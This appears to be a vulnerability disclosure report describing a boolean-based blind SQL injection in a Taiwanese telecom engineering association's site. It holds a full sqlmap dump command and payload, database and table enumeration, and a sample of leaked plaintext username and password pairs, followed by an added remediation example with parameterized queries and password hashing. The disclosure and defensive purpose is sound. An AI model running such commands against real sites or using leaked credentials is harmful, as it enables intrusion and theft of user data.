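2015-10-12: Details reported to the vendor; awaiting vendor response
2015-10-13: Vendor confirmed; details disclosed to the vendor only
2015-10-23: Details disclosed to core white hats and experts in related fields
2015-11-02: Details disclosed to regular white hats
2015-11-12: Details disclosed to intern white hats
2015-11-27: Details disclosed to the public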
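SQL injection vulnerability in a site of the Taiwan Telecommunication Engineering Industry Association (boolean-based blind / 67 tables / plaintext passwords of a large number of users leaked, allowing login)
Tested with sqlmap. Test URL: http://**.**.**.**/products/index.php?users_id=1248
python sqlmap.py -u "http://**.**.**.**/products/index.php?users_id=1248" -p users_id --technique=B --random-agent --threads=10 -D tteiaorgtw -T org_users -C username,password --dump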
---
Parameter: users_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: users_id=1248 AND 2122=2122
---
web server operating system: Linux CentOS
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [4]:
[*] information_schema
[*] test
[*] test_db
[*] tteiaorgtw
back-end DBMS: MySQL 5
Database: tteiaorgtw
[67 tables]
+----------------------------------+
| ip2nation                        |
| ip2nationcountries               |
| org_                             |
| org_action                       |
| org_action_2                     |
| org_ad                           |
| org_ad_type                      |
| org_calender                     |
| org_contact_us                   |
| org_course                       |
| org_course_type                  |
| org_download                     |
| org_download_folder              |
| org_download_type                |
| org_epaper                       |
| org_epaper_log                   |
| org_epaper_queue                 |
| org_epaper_result                |
| org_epaper_smtp                  |
| org_epaper_subscriber            |
| org_epaper_subscriber_type       |
| org_epapers                      |
| org_epapers_log                  |
| org_epapers_subscriber           |
| org_epapers_subscriber_type      |
| org_epapers_type                 |
| org_film                         |
| org_film_type                    |
| org_forum                        |
| org_forum_type                   |
| org_gallery                      |
| org_gallery_album                |
| org_gallery_type                 |
| org_key_cloud                    |
| org_link                         |
| org_news                         |
| org_news_type                    |
| org_payment                      |
| org_products                     |
| org_products_cate                |
| org_products_link                |
| org_products_spec                |
| org_products_type                |
| org_questionary                  |
| org_questionary_answer           |
| org_questionary_available        |
| org_questionary_subject          |
| org_questionary_type             |
| org_searchbot                    |
| org_shipment                     |
| org_site_map                     |
| org_statistics_agent             |
| org_statistics_functions         |
| org_statistics_login             |
| org_statistics_visitors          |
| org_statistics_visitors_20101028 |
| org_system_setting               |
| org_themes                       |
| org_trade                        |
| org_trade_detail                 |
| org_users                        |
| org_users_bak120525              |
| org_users_bk                     |
| org_users_cate                   |
| org_users_type                   |
| org_web_content                  |
| users_ub                         |
+----------------------------------+
Database: tteiaorgtw
Table: org_users
[41 columns]
+------------------------+-------------------+
| Column                 | Type              |
+------------------------+-------------------+
| address                | varchar(255)      |
| address_reg            | varchar(255)      |
| area                   | varchar(255)      |
| auth                   |                   |
| birthday               | varchar(10)       |
| career                 | varchar(255)      |
| cate_id                | int(10)           |
| company_name           | varchar(255)      |
| company_no             | varchar(255)      |
| contact                | varchar(255)      |
| contact_address        | varchar(255)      |
| contact_person         | varchar(255)      |
| content                | text              |
| date_end               | varchar(10)       |
| date_start             | varchar(10)       |
| educational_background | varchar(255)      |
| email                  | varchar(255)      |
| epaper_subscriber      | enum('0','1')     |
| excellent              | varchar(255)      |
| fax                    | v                 |
| id                     | int(10)           |
| lat                    | varchar(255)      |
| license                | varchar(255)      |
| lng                    | varchar(255)      |
| mobile                 | va                |
| name                   | varchar(100)      |
| note                   | text              |
| password               | varchar(100)      |
| professional_title     | varchar(255)      |
| profile                | text              |
| sex                    | enum('0','1')     |
| status                 | enum('0','1','2') |
| tel_1                  | varchar(50)       |
| tel_2                  | varchar(50)       |
| time_create            | varchar(19)       |
| time_modify            | varchar(19)       |
| type_id                | int(10)           |
| url                    | varchar(255)      |
| username               | varchar(100)      |
| xid                    | varchar(255)      |
| zip                    | varchar(10)       |
+------------------------+-------------------+
back-end DBMS: MySQL 5
Database: tteiaorgtw
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| org_users | 1930    |
+-----------+---------+
Because extraction is fairly slow, only 10 records were selected for the dump.
Database: tteiaorgtw
Table: org_users
[10 entries]
+----------+----------+
| username | password |
+----------+----------+
| 60105    | 000      |
| 50157    | 001      |
| 30105    | 001      |
| 50023    | 001      |
| 3        | 001      |
| 60369    | 002      |
| 1        | 003      |
| 10207    | 003      |
| 3        | 003      |
| 60153    | 005      |
+----------+----------+
There are more than 1,000 users, all with passwords stored in plaintext; only one is selected here as proof of login.
Add filtering.
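An added example, not part of the original report or the site's code, of what the recommended filtering looks like next to the flawed pattern, together with salted password hashing in place of the plaintext storage noted above. The query shape, the simplified org_users table, the function names and the use of SQLite in place of MySQL are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_password(password, salt=None):
    """Return 'salt$digest' (hex) using PBKDF2-HMAC-SHA256 instead of plaintext."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex = stored.split("$", 1)[0]
    return hmac.compare_digest(hash_password(password, bytes.fromhex(salt_hex)), stored)

def make_db():
    """Constructed stand-in for org_users (SQLite here, MySQL on the real site)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE org_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO org_users VALUES (1248, 'demo_user', ?)",
               (hash_password("constructed-pass"),))
    return db

def lookup_vulnerable(db, users_id):
    """Assumed shape of the flaw: the GET value is concatenated into the SQL text."""
    return db.execute("SELECT username FROM org_users WHERE id = " + users_id).fetchall()

def lookup_hardened(db, users_id):
    """Filter the value, then bind it as a parameter so it stays data."""
    if not (users_id.isascii() and users_id.isdigit() and len(users_id) <= 10):
        return []  # reject anything that is not a plain decimal id
    return db.execute("SELECT username FROM org_users WHERE id = ?",
                      (int(users_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # The second value carries the condition from the sqlmap output above; the third
    # is its constructed always-false counterpart. A differing answer is the oracle.
    for value in ("1248", "1248 AND 2122=2122", "1248 AND 2122=2123"):
        print(repr(value), lookup_vulnerable(db, value), lookup_hardened(db, value))
```

In the concatenated version the true and false conditions return different results, which is the signal a boolean-based blind test relies on; the filtered, parameterized version answers both the same way.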
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-10-13 14:33
Thank you for the report
None yet